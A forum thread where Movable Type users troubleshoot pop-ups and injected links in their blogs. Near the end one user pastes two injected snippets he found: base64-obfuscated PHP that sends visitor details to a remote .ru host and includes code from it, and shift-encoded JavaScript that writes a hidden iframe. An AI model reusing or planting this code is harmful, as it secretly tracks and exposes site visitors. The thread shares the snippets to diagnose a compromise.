Security: Mt 3.2 Hacked?, now our blogs shows pop-ups Options

[tscasag]

some weeks ago pop-ups (pop-under, actually) started to come out from our blogs (url: www.verbeat.org/blogs). our ISP informed us that it was a flaw in MT, that someone hacked us using SQL Injection (?) and we should upgrade it to the last version - but we're *already* running with 3.2.

any ideas?
does it happen with somebody else?
any tips on how to remove it? (it appears to be calling a script)

our system seems to be working fine, though. url: www.verbeat.org/mt.htm. we're using linux, MySQL dbase.

thanks

tiago

[sarah]

Did your webhost explain to you the nature of this alleged flaw in Movable Type? Did the hacker gain access to your Movable Type templates (I'm assuming this is how they added any code to call the pop-unders?) via your installation (ie, by obtaining your login details), or did they perhaps access your MySQL database directly, or the published files on the server?

If you want to remove any code you don't want, you would need to edit your templates to remove this. Or, if your host has a backup of your database from prior to the hack, you could ask that they restore this for you, and then rebuild your site.

[elisebauer]

Are you using the "link to file" feature for your templates? If so, you are saving copies of your templates outside the the database. Something similar happened to me a year ago and the problem was that since I didn't turn on the CGIwrap SuExec in the mt config file, my files outside the database were more vulnerable to attack. If you have saved a template to file, and someone makes changes to those files, then when you rebuild your site, the ammended file will be saved into the DB. Thousands of pages on my blog were corrupted this way. See my write-up here: attacked.

[tscasag]

Hi and thanks for the help.

But no, I'm not using the "link to file" feature. And the webhost told us the MySQL database was attacked directly. He also directed me to this page: http://search.securityfocus.com/swsearch?s...e-Type&x=24&y=6.
For what I have read, all of them were fixed in newer versions of MT...

I've had double-checked my templates for any strange code, but there is nothing there too :-/

To make things worst, we were not able to find out when the pop-ups started appearing, and with 20 blogs running, a database backup would be chaos...

Gonna read your info now, Elise, and see if I can find something else.

Thanks again

tiago

[shelley]

Your host seems to be saying contradictory things - first, that this was a flaw in Movable Type, and then that the MySQL database was attacked directly.

And then there's the third possibility as suggested by Elise: that someone gained access to the server and modified the actual blog files (assuming you're using static publishing).

The last one actually seems to be the more likely option, since you can't find any odd code in the templates.

[tscasag]

Shelley, yet I'm using one of the biggest webhosts here in Brazil, I can imagine they don't really know what they're talking about. I mean, it's so easy to say "the problem is the software - upgrade it - we're washing our hands".

And yes, I'm using static publishing. No PHP here.

Do you think a new upload of the MT files would be a chance shot?

[shelley]

I'm not saying they don't know what they're talking about, only that they've not been clear about what they think really happened here. We can't determine whether or not the problem is in Movable Type without actual information that suggests it is. And it's just that I've lost count of the number of times a conversation has started with "My host said Movable Type has a security hole" and ended with "Oops, they say now it wasn't Movable Type; someone hacked the server."

"The MySQL database was attacked directly" but "the problem is in the software". Those are the two things contradict each other - if the database was attacked directly, how was Movable Type the problem? - which is what is confusing here.

There aren't any currently known vulnerabilities in Movable Type which would allow an *outsider* to inject malicious code into your files. Insiders (i.e., authors) can use javascript, PHP, etc. into their entries or templates; but it's kind of hard to disallow those things when users want to be able to customize their code.

If you can't see any of this bad code in the Template(s) in the Movable Type interface or in the column for the template code in the MySQL database table, then that would leave the files on the server to be the culprit. You could try a Rebuild Site to see if Movable Type can overwrite them all.

Do you see the popups when using Movable Type, or only when visiting the weblog pages? Uploading the Movable Type files again would only work if the hacker modified some of the original files.

[tscasag]

Shelley, thanks for all your patience and info.

Yes, the pop-ups only appear when viewing the blog pages - not when using the system. And it's only some of our blogs, not all of them.

I'm gonna check the tables in the SQL database once more - a friend has did it and found nothing. Gonna try the rebuild, too. And if it doesn't solve the problem, will upload the MT files again.

(crossing fingers)

[Shanep]

I have been having a similar issue. I am getting random links injected into my pages along with some javascript.

They're being injected directly into the HTML pages - not even the templates.

Any tips? :/

I have a LOT of content on my Blog it's going to be a real pity to just ditch it but almost all of the pages that are archived seem to have it even tho there is nothing in the archive templates. It's just directly in the page that is created :/

Thanks in advance

Shane

[imabug]

I have been having a similar issue.  I am getting random links injected into my pages along with some javascript.

They're being injected directly into the HTML pages - not even the templates.

Any tips? :/

I have a LOT of content on my Blog it's going to be a real pity to just ditch it but almost all of the pages that are archived seem to have it even tho there is nothing in the archive templates.  It's just directly in the page that is created :/

Thanks in advance

Shane

If your blog content and templates all look ok, there's really nothing that can be done from MT's side of things. Sounds like something you'll need to take up with your host provider. Either they're using their webserver to send additional content to the browser, or they have some security issues that is allowing someone to sneak in extra crap.

[Shanep]

Thanks for the repy.

Yeah I'm a little confused.

In *EVERY* single archived page there is some arbitrary link.

A couple of months back I was finding a few lines of javascript in the files as well. The code was somehow obfuscated/encrypted so I'm not exactly sure what it was doing. All I know is it wasn't supposed to be there.

My problem here mainly is that some of these links are trying to install trojans - which probably now explains what the javascript is doing. It only seems to affect IE.

The good news is it doesn't seem to be in any of my templates so hopefully I can figure out an easy way to wipe out all archives and rebuild.

Thanks again for the reply

[tscasag]

In our case, the pop-ups appear with Firefox, either. And I've never saw any strange code in our templates...

I've rebuild it all (twice) and things didn't change. I'm trying to get something from my ISP now.

[tscasag]

problem fixed

I'm feeling real stupid. But what was generating the pop-ups was the NEDSTAT Counter.

As we have +20 blogs, and the counter was installed only on some of them, we thought the problem was a random issue. It wasn't. And our ISP doesn't help us at all telling that it was a security flaw in MT (obviously just trying to push the problem forward). We just found that NEDSTAT was causing that by accident.

Also, the counter - free - didn't showed pop-ups until some time ago. In the beggining, it was a clean service. Then they changed their page, saying the service would be nicer and smarter and etc - and started with the pop-ups. I received some notifications from the company, but none of them talked about this, of course.

I apologize for all those who took the time to help. Now I'm gonna spread the word about them. And I ain't gonna say pretty things.

Anyway, hope this can help other people too.

Thanks again

Tiago

[russemerson]

I have been having a similar issue.  I am getting random links injected into my pages along with some javascript.

They're being injected directly into the HTML pages - not even the templates.

Any tips? :/

I have a LOT of content on my Blog it's going to be a real pity to just ditch it but almost all of the pages that are archived seem to have it even tho there is nothing in the archive templates.  It's just directly in the page that is created :/

Thanks in advance

Shane

In my case, which occurred yesterday, the templates themselves were the recipients of the unwanted injections. There were links to spam sites, and an obfuscated javascript which attempted to load a WMF to the reader. I believe the latter was an attempted browser hijack, though I could be wrong.

Fortunately, the template munging affected the layout of my site, so I was immediately able to see there was a problem. Had that not been the case, I hate to think how long it might have gone before I caught it.

I looked through my site logs - there was no evidence of a brute-force attack on my admin login, and my webhost saw no evidence of the server having been cracked.

I saved some examples of the injected code. I found the following preceeding the DTD in some of the templates:

CODE

<?xml version="1.0" encoding="iso-8859-1"error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

I don't know what it means, but it looks evil.

I also found scripts like the following at the bottom of other templates:

CODE

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#v
furoolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<= k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);
</script>

Ditto the "evil" remark above.

Interestingly (?) in each affected template, it was one or the other of the injections, but not both, though there were static spam links in the templates which had been hit with the second code snippet.

[russemerson]

Additional to the previous...

I'm on 3.14, though my 3.2 upgrade plans have now been advanced to "as soon as possible."

Also, I notice that when I publish or republish a post, the main index now does not rebuild. How it's related, I don't know - but I do not believe in coincidences... not like this.

[lisa]

I think this information will help you tighten up your permissions... Also, you said that you can not rebuild your site? Do you get errors?

There are two articles on Learning Movable Type that will explain how Elise tightened down her permissions after she had trouble with hackers:
http://www.learningmovabletype.com/announc...822attacked.php
http://www.learningmovabletype.com/announc...to_attacked.php

She also has an article about setting the Umask directives:
http://www.learningmovabletype.com/archive..._and_suexec.php